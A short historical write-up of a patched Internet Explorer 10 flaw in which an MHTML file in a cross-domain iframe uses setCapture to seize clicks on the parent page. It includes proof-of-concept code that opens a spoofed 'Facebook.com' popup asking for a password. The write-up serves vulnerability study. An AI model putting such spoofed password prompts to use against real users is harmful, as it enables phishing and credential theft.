This is a variation on the setCapture capture family that specifically uses MHTML to make the technique work in contexts where it otherwise would not. From inside any iFrame — even one on a completely different domain, like an evil iframe embedded in a legitimate page — loading an MHTML with a setCapture handler causes clicks anywhere on the main window to route through the iFrame’s document, allowing a popup to be opened that the user believes came from the main page.
// Code inside the MHTML file loaded in the iFrame:
document.body.onclick = function() {
var win = window.open("", "", "width=400,height=200");
win.document.title = "Facebook.com";
win.document.body.innerHTML = 'Please, enter your password...';
}
document.body.setCapture();The critical observation is that this works only because the code runs inside an MHTML file. The identical code in a regular HTML file does not produce the same behavior — the setCapture call in a regular iFrame does not capture events from the parent document. Tested on Win8 IE10.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.